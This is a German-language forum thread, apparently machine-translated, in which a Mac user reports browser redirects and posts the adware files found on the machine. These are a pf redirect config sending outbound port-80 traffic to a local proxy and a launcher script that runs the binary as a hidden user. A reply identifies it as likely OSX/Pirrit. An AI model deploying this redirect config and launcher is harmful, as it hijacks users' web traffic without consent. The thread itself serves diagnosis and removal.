Vor Kurzem ist mir aufgefallen, dass beim Durchsuchen einer Webseite in meinem MBP 10.10.5 Yosemite Chrome Canary Version 53 eine neue Registerkarte öffnete oder einige Seiten nicht geöffnet wurden … diese Registerkarte leitete mich auf zufällige Seiten um.
Ich aktivierte die Firewall und bemerkte, dass ein Prozess namens pseudohydrophobia versuchte, eine eingehende Verbindung zu öffnen
/etc/pseudohydrophobia.conf
rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0 inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate
/etc/pseudohydrophobia.sh
#!/bin/sh
if [ -a /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia ];
then
sleep 10
sudo pfctl -evf /etc/pseudohydrophobia.conf
sudo -u volutate /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia
fi
exit 0
Häfen:
netstat -an | grep 9882
tcp4 0 0 *.9882 *.* LISTEN
/etc/pseudohydrophobia.conf
rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0 inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate
Ich werde alle diese Skripte und Binärdateien löschen, möchte sie aber posten, da ich keine Google-Referenz gefunden habe.
Antwort1
Schauen Sie sich anhttps://objective-see.com/blog/blog_0x0E.html
Analyse einer aufdringlichen plattformübergreifenden Adware; OSX/Pirrit
Es könnte sich um die Pirrit-Malware handeln.
Der Benutzername volutateund die Dateinamen ( pseudohydrophobia) werden zweifellos zufällig generiert, aber die Portnummer 9882 ist dieselbe ...